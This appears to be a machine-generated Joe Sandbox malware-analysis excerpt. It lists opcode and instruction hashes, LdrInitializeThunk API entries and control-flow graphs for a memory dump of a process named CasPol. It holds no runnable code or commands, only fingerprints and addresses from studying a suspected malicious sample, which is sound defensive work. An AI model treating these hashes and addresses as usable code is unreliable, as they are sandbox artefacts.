                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 818302b56c54c341c47bd9f0a52f5c6abd527ca352b7b3054371254110737a83
                                                                                                                      • Instruction ID: be4c30ad81033de8f8683c06420d07cda0890cf1b1b9dec29f0ea62b029cf319
                                                                                                                      • Opcode Fuzzy Hash: 818302b56c54c341c47bd9f0a52f5c6abd527ca352b7b3054371254110737a83
                                                                                                                      • Instruction Fuzzy Hash: 7F520474A14224CFDB69AF70C88879DBBB6BB89305F2085EAD50DA3354DB349E85CF11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 39a3c4f083c66fbb3a2f6b6878533d089f3423948de8f6fc05138527e3ef1f23
                                                                                                                      • Instruction ID: 4120a8a57874697bf6056e5bad9b27f9d8891d6bb5e8df179d894e656a3fe915
                                                                                                                      • Opcode Fuzzy Hash: 39a3c4f083c66fbb3a2f6b6878533d089f3423948de8f6fc05138527e3ef1f23
                                                                                                                      • Instruction Fuzzy Hash: 95520474A14224CFDB69AF70C88879DBBB6BB89305F2085EAD50DA3354DB349E85CF11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 1c4a375ca0ecfba0ac9cc1bc586b50ab20381faa8a95404caea1bacef106ff87
                                                                                                                      • Instruction ID: 8d82fcf5e573abcf032d82d58e1b784ebc4d25ac272265099f29284683e7198c
                                                                                                                      • Opcode Fuzzy Hash: 1c4a375ca0ecfba0ac9cc1bc586b50ab20381faa8a95404caea1bacef106ff87
                                                                                                                      • Instruction Fuzzy Hash: 5952F474A14224CFDB69AF70C88879DBBB6BB89305F2085EAD50DA3354DB349E85CF11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: b7a0ee7b688bdca44acbddb156e56459b91895d8379e71d9c32d410962465bfb
                                                                                                                      • Instruction ID: 285a74f17d2467c28e771dd8a3570a5eda28d541839ce218c18373cd59f458a4
                                                                                                                      • Opcode Fuzzy Hash: b7a0ee7b688bdca44acbddb156e56459b91895d8379e71d9c32d410962465bfb
                                                                                                                      • Instruction Fuzzy Hash: 7D520474A14224CFCB65AF70C88879DBBB6BB89305F2085EAD60DA3354DB349E85CF11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: cf02f48f6c27469661e1a0f36264959682797e1b30e5652d0b92b897242b115b
                                                                                                                      • Instruction ID: 5c32f47a63242ab758ce22017905e3b7cfe2be17d50234d17dbe399dde7f7be1
                                                                                                                      • Opcode Fuzzy Hash: cf02f48f6c27469661e1a0f36264959682797e1b30e5652d0b92b897242b115b
                                                                                                                      • Instruction Fuzzy Hash: 92520474A14224CFDB65AF70C88879DBBB6BB89305F2085EAD50DA3354DB349E85CF11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: ec5674e52ba49e20fc3f37c041df7cc2873adbe6163cd35f5cca52c52dfe25f6
                                                                                                                      • Instruction ID: 89632f456b3851ab6c415d83107f5873ddd8bb935715fcbab0cb954f090c647b
                                                                                                                      • Opcode Fuzzy Hash: ec5674e52ba49e20fc3f37c041df7cc2873adbe6163cd35f5cca52c52dfe25f6
                                                                                                                      • Instruction Fuzzy Hash: FB420474A14224CFDB65AF70C88879DBBB6BB89305F2085EAD60DA3354DB349E85CF11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: e4ee83ecc076f35ca71a74bfbfc0fda211868accad92a5129c611d0fa17e046f
                                                                                                                      • Instruction ID: 552706b15ddd7123f54113116383b66b06f7dfc068720cb0e3de62ab6bb925ed
                                                                                                                      • Opcode Fuzzy Hash: e4ee83ecc076f35ca71a74bfbfc0fda211868accad92a5129c611d0fa17e046f
                                                                                                                      • Instruction Fuzzy Hash: CB42F474A14224CFDB65AF70C88879DBBB6BB89305F2085EAD60DA3354DB349E85CF11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: c76c48ec4cafc010f513a0174edd987c10621ceb57de347e2061aae6f491419a
                                                                                                                      • Instruction ID: 79f2f0fd295ed6ebb671d257927026eb406d0b133378674fd716f339f392acd2
                                                                                                                      • Opcode Fuzzy Hash: c76c48ec4cafc010f513a0174edd987c10621ceb57de347e2061aae6f491419a
                                                                                                                      • Instruction Fuzzy Hash: FB420574A14224CFCB65AF70C98879DBBB6BB89305F2085EAD60DA3354DB349E85CF11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 28d28178fdf36b2c11f8d835c0331d9263df0bb9f6a16a4fd7515677bd5a9f0c
                                                                                                                      • Instruction ID: d4efd7b60d841c33b05781c9ccf45fd513bf01de658bcb0e8a26d5b24b690d2e
                                                                                                                      • Opcode Fuzzy Hash: 28d28178fdf36b2c11f8d835c0331d9263df0bb9f6a16a4fd7515677bd5a9f0c
                                                                                                                      • Instruction Fuzzy Hash: 9B420574A14224CFCB65AF70C88879DBBB6BB89305F2085EAD60DA3354DB349E85CF11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: ff6e168a7927db4285573e96448bee6aaea34b9d1e7786e2527a25ba1cdf2e0b
                                                                                                                      • Instruction ID: d478ed7aef11bca889d00bf9f7f09e27eba411b94db8303484ffb09346aba7b8
                                                                                                                      • Opcode Fuzzy Hash: ff6e168a7927db4285573e96448bee6aaea34b9d1e7786e2527a25ba1cdf2e0b
                                                                                                                      • Instruction Fuzzy Hash: 28420574A14224CFDB65AF70C88879DBBB6BB89305F2085EAD60DA3354DB349E85CF11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: bb51715df77d9907feb154e52aea8803c8d584fdbec998d882e9b0d322b6cc88
                                                                                                                      • Instruction ID: e8fc8ec693f074b596e003d93e8deb1af173492ac32dc19c422dedb7e778256f
                                                                                                                      • Opcode Fuzzy Hash: bb51715df77d9907feb154e52aea8803c8d584fdbec998d882e9b0d322b6cc88
                                                                                                                      • Instruction Fuzzy Hash: DE420574A14224CFDB65AF70C88879DBBB6BB89305F2085EAD60DA3354DB349E85CF11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: f6551d7ccc8d001a272dd028e28171a6aaafd9df887d7b035cbe68d099395484
                                                                                                                      • Instruction ID: 95ae06b1f4c88455bce840ced28fb14138991b12bd19f6d790b55d7b0fdccd9e
                                                                                                                      • Opcode Fuzzy Hash: f6551d7ccc8d001a272dd028e28171a6aaafd9df887d7b035cbe68d099395484
                                                                                                                      • Instruction Fuzzy Hash: 29421674A14224CFDB65AF70C98879DBBB6BB89305F2085EAD60DA3354DB349E85CF10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 347508ffb3dd6575540c6dc2007eecb5b7a5989b41521ec28b82c13d080567a5
                                                                                                                      • Instruction ID: 24575d6317a13dd4a08c3ad045bfff4ca49c1869bde41e213b0314ff3b2ac7d8
                                                                                                                      • Opcode Fuzzy Hash: 347508ffb3dd6575540c6dc2007eecb5b7a5989b41521ec28b82c13d080567a5
                                                                                                                      • Instruction Fuzzy Hash: BA320674A14224CFDB699F70C98879DBBB6BB89305F2085EAD60DA3354DB349E85CF10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 5050c5ffb57ddc36c59f1f3a057318629eb18d21a56b3a23f9ebb2003f58ac77
                                                                                                                      • Instruction ID: 5abc839a40415f6175b0cd4bae5ff05a8cc22974db803a6a75e419b2a77edded
                                                                                                                      • Opcode Fuzzy Hash: 5050c5ffb57ddc36c59f1f3a057318629eb18d21a56b3a23f9ebb2003f58ac77
                                                                                                                      • Instruction Fuzzy Hash: 75320674A14224CFDB659F70C98879DBBB6BB89305F2085EAD60DA3354DB349E85CF10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: c258a7e1a45738476c9c7ad01fd45dd27078b125eb440da720e2580b0c3f50b7
                                                                                                                      • Instruction ID: e9ce6a0a5e150ee57fb4c4fc0005258a76a64ba4320dd1e3bc1615b8c09a9233
                                                                                                                      • Opcode Fuzzy Hash: c258a7e1a45738476c9c7ad01fd45dd27078b125eb440da720e2580b0c3f50b7
                                                                                                                      • Instruction Fuzzy Hash: 5F320674A14224CFDB699F70C98879DBBB6BB89305F2085EAD60DA3354DB349E85CF10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: d613a4013024e0dd9349681944e1d0ff2da34ab9fe82c9146f54f6cf6bb97370
                                                                                                                      • Instruction ID: ded087b4c0b15963365a5279ca8287d12e5a71c3ef0762ca69331b5a1eca1887
                                                                                                                      • Opcode Fuzzy Hash: d613a4013024e0dd9349681944e1d0ff2da34ab9fe82c9146f54f6cf6bb97370
                                                                                                                      • Instruction Fuzzy Hash: EC321674A14224CFDB69AF70C98879DBBB6BB89305F2085EAD50DA3354DB349E85CF10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 9d791f934ddc0ef6e6550d79f48b193d8043da9768e3e12168b6d34165c95483
                                                                                                                      • Instruction ID: ebd698a0be80ec34878942d6de77e4cc622ea1a93fd88799c221b74fb85fd348
                                                                                                                      • Opcode Fuzzy Hash: 9d791f934ddc0ef6e6550d79f48b193d8043da9768e3e12168b6d34165c95483
                                                                                                                      • Instruction Fuzzy Hash: 7A321674A142248FDB699F70C88879DBBB6BB89305F2085EAD60DA3354DB349E85CF10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 11000 20037464-200374c4 call 20036288 call 20036418 call 122f810 11314 200374c4 call 122fbb0 11000->11314 11315 200374c4 call 122fcc1 11000->11315 11316 200374c4 call 122fc5f 11000->11316 11009 200374ca-20037509 11319 20037509 call 1200040 11009->11319 11320 20037509 call 1200014 11009->11320 11012 2003750f-2003754e 11328 2003754e call 12018a7 11012->11328 11329 2003754e call 1201838 11012->11329 11330 2003754e call 1201848 11012->11330 11015 20037554-20037614 11341 20037614 call 1201e00 11015->11341 11342 20037614 call 12023f0 11015->11342 11343 20037614 call 12035d4 11015->11343 11344 20037614 call 12021d8 11015->11344 11345 20037614 call 120200d 11015->11345 11346 20037614 call 120211f 11015->11346 11024 2003761a-200376a4 11351 200376a4 call 1203c70 11024->11351 11352 200376a4 call 1203cd0 11024->11352 11030 200376aa-200376ec 11353 200376ec call 1204420 11030->11353 11354 200376ec call 1204411 11030->11354 11355 200376ec call 12047f7 11030->11355 11356 200376ec call 1204798 11030->11356 11033 200376f2-20037734 11363 20037734 call 12048b8 11033->11363 11364 20037734 call 1204859 11033->11364 11036 2003773a-2003777c 11300 2003777c call 1205955 11036->11300 11301 2003777c call 1205958 11036->11301 11039 20037782-200377da 11307 200377da call 12061a0 11039->11307 11308 200377da call 120605a 11039->11308 11309 200377da call 12061ff 11039->11309 11043 200377e0-2003785e 11317 2003785e call 12065e0 11043->11317 11318 2003785e call 12064e0 11043->11318 11049 20037864-200378dd 11335 200378e3 call 1206ad5 11049->11335 11336 200378e3 call 12069a8 11049->11336 11337 200378e3 call 1206a08 11049->11337 11338 200378e3 call 1206a58 11049->11338 11056 200378e9-2003790b 11339 2003790d call 1206ba0 11056->11339 11340 2003790d call 1206b90 11056->11340 11060 20037913-20037939 11347 2003793b call 1206ba0 11060->11347 11348 2003793b call 1206b90 11060->11348 11064 20037941-20037967 11357 20037969 call 1206ba0 11064->11357 11358 20037969 call 1206b90 11064->11358 11068 2003796f-20037995 11298 20037997 call 1206ba0 11068->11298 11299 20037997 call 1206b90 11068->11299 11072 2003799d-200379c3 11302 200379c5 call 1206ba0 11072->11302 11303 200379c5 call 1206b90 11072->11303 11076 200379cb-20037a37 LdrInitializeThunk 11077 20037d5e 11076->11077 11078 20037a3d-20037a61 11076->11078 11311 20037d5e call 12071c0 11077->11311 11312 20037d5e call 12070c0 11077->11312 11313 20037d5e call 12070d0 11077->11313 11084 20037a67 11078->11084 11085 20037bba-20037bde 11078->11085 11080 20037d64-20037da6 11321 20037da6 call 12071c0 11080->11321 11322 20037da6 call 12070c0 11080->11322 11323 20037da6 call 12070d0 11080->11323 11324 20037da6 call 1207520 11080->11324 11325 20037da6 call 1207620 11080->11325 11326 20037da6 call 12074b6 11080->11326 11084->11085 11086 20037a6d-20037bb5 11084->11086 11094 20037be0 11085->11094 11095 20037be4-20037be6 11085->11095 11086->11077 11087 20037dac-20037e36 11361 20037e36 call 1207c08 11087->11361 11362 20037e36 call 1207c68 11087->11362 11096 20037be2 11094->11096 11097 20037be8 11094->11097 11098 20037bed-20037c17 11095->11098 11096->11095 11097->11098 11106 20037c19 11098->11106 11107 20037c1d-20037c1f 11098->11107 11109 20037c21 11106->11109 11110 20037c1b 11106->11110 11111 20037c26-20037c2c 11107->11111 11109->11111 11110->11107 11111->11077 11113 20037c32-20037d35 11111->11113 11112 20037e3c-20037e7e 11304 20037e7e call 1207d80 11112->11304 11305 20037e7e call 1207e30 11112->11305 11306 20037e7e call 1207e8f 11112->11306 11113->11077 11120 20037e84-20037ec6 11331 20037ec6 call 1207f50 11120->11331 11332 20037ec6 call 1207ef2 11120->11332 11128 20037ecc-20037f56 11359 20037f56 call 12087f8 11128->11359 11360 20037f56 call 1208858 11128->11360 11144 20037f5c-20038038 call 120974c 11167 20038331-20038342 11144->11167 11168 2003803e-20038061 11144->11168 11174 20038348-2003834f 11167->11174 11175 2003869c-200386a3 11167->11175 11183 20038067-20038083 11168->11183 11184 20038319-2003832e 11168->11184 11178 200383e6-200383ed 11174->11178 11179 20038355-20038363 11174->11179 11180 20038725-20038740 11175->11180 11181 200386a9-2003871a 11175->11181 11185 200383f3-20038538 call 20035aa8 call 200356b0 11178->11185 11186 2003855d-20038564 11178->11186 11333 20038369 call 1209d90 11179->11333 11334 20038369 call 1209d81 11179->11334 11181->11180 11202 2003808b-200380d9 11183->11202 11184->11167 11185->11175 11186->11175 11188 2003856a-2003867f call 20035aa8 call 200356b0 call 200356f8 11186->11188 11188->11175 11201 2003836f-200383a9 11349 200383af call 120b058 11201->11349 11350 200383af call 120afba 11201->11350 11212 20038301-20038313 11202->11212 11213 200380df-200380e6 11202->11213 11212->11183 11212->11184 11216 200381ff-2003822a 11213->11216 11217 200380ec-200381fa 11213->11217 11216->11212 11220 20038230-200382d8 11216->11220 11217->11212 11220->11212 11221 200383b5 11221->11175 11298->11072 11299->11072 11300->11039 11301->11039 11302->11076 11303->11076 11304->11120 11305->11120 11306->11120 11307->11043 11308->11043 11309->11043 11311->11080 11312->11080 11313->11080 11314->11009 11315->11009 11316->11009 11317->11049 11318->11049 11319->11012 11320->11012 11321->11087 11322->11087 11323->11087 11324->11087 11325->11087 11326->11087 11328->11015 11329->11015 11330->11015 11331->11128 11332->11128 11333->11201 11334->11201 11335->11056 11336->11056 11337->11056 11338->11056 11339->11060 11340->11060 11341->11024 11342->11024 11343->11024 11344->11024 11345->11024 11346->11024 11347->11064 11348->11064 11349->11221 11350->11221 11351->11030 11352->11030 11353->11033 11354->11033 11355->11033 11356->11033 11357->11068 11358->11068 11359->11144 11360->11144 11361->11112 11362->11112 11363->11036 11364->11036
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: c9d03b3ad623fea9f6df3b922f4e2a72887ae80eb055ce946bc468e3f588a6df
                                                                                                                      • Instruction ID: 280b3752051c7f9579f24f7a4789257e6dd96097427677644d4659e369f1bd52
                                                                                                                      • Opcode Fuzzy Hash: c9d03b3ad623fea9f6df3b922f4e2a72887ae80eb055ce946bc468e3f588a6df
                                                                                                                      • Instruction Fuzzy Hash: D8321674A142248FDB699F70C88879DBBB6BF89305F2085EAD60DA3354DB349E85CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 11365 200374a9-200374c4 call 20036288 call 20036418 11699 200374c4 call 122fbb0 11365->11699 11700 200374c4 call 122fcc1 11365->11700 11701 200374c4 call 122fc5f 11365->11701 11371 200374ca-20037509 11704 20037509 call 1200040 11371->11704 11705 20037509 call 1200014 11371->11705 11374 2003750f-2003754e 11713 2003754e call 12018a7 11374->11713 11714 2003754e call 1201838 11374->11714 11715 2003754e call 1201848 11374->11715 11377 20037554-20037614 11660 20037614 call 1201e00 11377->11660 11661 20037614 call 12023f0 11377->11661 11662 20037614 call 12035d4 11377->11662 11663 20037614 call 12021d8 11377->11663 11664 20037614 call 120200d 11377->11664 11665 20037614 call 120211f 11377->11665 11386 2003761a-200376a4 11670 200376a4 call 1203c70 11386->11670 11671 200376a4 call 1203cd0 11386->11671 11392 200376aa-200376ec 11672 200376ec call 1204420 11392->11672 11673 200376ec call 1204411 11392->11673 11674 200376ec call 12047f7 11392->11674 11675 200376ec call 1204798 11392->11675 11395 200376f2-20037734 11682 20037734 call 12048b8 11395->11682 11683 20037734 call 1204859 11395->11683 11398 2003773a-2003777c 11686 2003777c call 1205955 11398->11686 11687 2003777c call 1205958 11398->11687 11401 20037782-200377da 11693 200377da call 12061a0 11401->11693 11694 200377da call 120605a 11401->11694 11695 200377da call 12061ff 11401->11695 11405 200377e0-2003785e 11702 2003785e call 12065e0 11405->11702 11703 2003785e call 12064e0 11405->11703 11411 20037864-200378dd 11720 200378e3 call 1206ad5 11411->11720 11721 200378e3 call 12069a8 11411->11721 11722 200378e3 call 1206a08 11411->11722 11723 200378e3 call 1206a58 11411->11723 11418 200378e9-2003790b 11724 2003790d call 1206ba0 11418->11724 11725 2003790d call 1206b90 11418->11725 11422 20037913-20037939 11666 2003793b call 1206ba0 11422->11666 11667 2003793b call 1206b90 11422->11667 11426 20037941-20037967 11676 20037969 call 1206ba0 11426->11676 11677 20037969 call 1206b90 11426->11677 11430 2003796f-20037995 11684 20037997 call 1206ba0 11430->11684 11685 20037997 call 1206b90 11430->11685 11434 2003799d-200379c3 11688 200379c5 call 1206ba0 11434->11688 11689 200379c5 call 1206b90 11434->11689 11438 200379cb-20037a37 LdrInitializeThunk 11439 20037d5e 11438->11439 11440 20037a3d-20037a61 11438->11440 11696 20037d5e call 12071c0 11439->11696 11697 20037d5e call 12070c0 11439->11697 11698 20037d5e call 12070d0 11439->11698 11446 20037a67 11440->11446 11447 20037bba-20037bde 11440->11447 11442 20037d64-20037da6 11706 20037da6 call 12071c0 11442->11706 11707 20037da6 call 12070c0 11442->11707 11708 20037da6 call 12070d0 11442->11708 11709 20037da6 call 1207520 11442->11709 11710 20037da6 call 1207620 11442->11710 11711 20037da6 call 12074b6 11442->11711 11446->11447 11448 20037a6d-20037bb5 11446->11448 11456 20037be0 11447->11456 11457 20037be4-20037be6 11447->11457 11448->11439 11449 20037dac-20037e36 11680 20037e36 call 1207c08 11449->11680 11681 20037e36 call 1207c68 11449->11681 11458 20037be2 11456->11458 11459 20037be8 11456->11459 11460 20037bed-20037c17 11457->11460 11458->11457 11459->11460 11468 20037c19 11460->11468 11469 20037c1d-20037c1f 11460->11469 11471 20037c21 11468->11471 11472 20037c1b 11468->11472 11473 20037c26-20037c2c 11469->11473 11471->11473 11472->11469 11473->11439 11475 20037c32-20037d35 11473->11475 11474 20037e3c-20037e7e 11690 20037e7e call 1207d80 11474->11690 11691 20037e7e call 1207e30 11474->11691 11692 20037e7e call 1207e8f 11474->11692 11475->11439 11482 20037e84-20037ec6 11716 20037ec6 call 1207f50 11482->11716 11717 20037ec6 call 1207ef2 11482->11717 11490 20037ecc-20037f56 11678 20037f56 call 12087f8 11490->11678 11679 20037f56 call 1208858 11490->11679 11506 20037f5c-20038038 call 120974c 11529 20038331-20038342 11506->11529 11530 2003803e-20038061 11506->11530 11536 20038348-2003834f 11529->11536 11537 2003869c-200386a3 11529->11537 11545 20038067-20038083 11530->11545 11546 20038319-2003832e 11530->11546 11540 200383e6-200383ed 11536->11540 11541 20038355-20038363 11536->11541 11542 20038725-20038740 11537->11542 11543 200386a9-2003871a 11537->11543 11547 200383f3-20038538 call 20035aa8 call 200356b0 11540->11547 11548 2003855d-20038564 11540->11548 11718 20038369 call 1209d90 11541->11718 11719 20038369 call 1209d81 11541->11719 11543->11542 11564 2003808b-200380d9 11545->11564 11546->11529 11547->11537 11548->11537 11550 2003856a-2003867f call 20035aa8 call 200356b0 call 200356f8 11548->11550 11550->11537 11563 2003836f-200383a9 11668 200383af call 120b058 11563->11668 11669 200383af call 120afba 11563->11669 11574 20038301-20038313 11564->11574 11575 200380df-200380e6 11564->11575 11574->11545 11574->11546 11578 200381ff-2003822a 11575->11578 11579 200380ec-200381fa 11575->11579 11578->11574 11582 20038230-200382d8 11578->11582 11579->11574 11582->11574 11583 200383b5 11583->11537 11660->11386 11661->11386 11662->11386 11663->11386 11664->11386 11665->11386 11666->11426 11667->11426 11668->11583 11669->11583 11670->11392 11671->11392 11672->11395 11673->11395 11674->11395 11675->11395 11676->11430 11677->11430 11678->11506 11679->11506 11680->11474 11681->11474 11682->11398 11683->11398 11684->11434 11685->11434 11686->11401 11687->11401 11688->11438 11689->11438 11690->11482 11691->11482 11692->11482 11693->11405 11694->11405 11695->11405 11696->11442 11697->11442 11698->11442 11699->11371 11700->11371 11701->11371 11702->11411 11703->11411 11704->11374 11705->11374 11706->11449 11707->11449 11708->11449 11709->11449 11710->11449 11711->11449 11713->11377 11714->11377 11715->11377 11716->11490 11717->11490 11718->11563 11719->11563 11720->11418 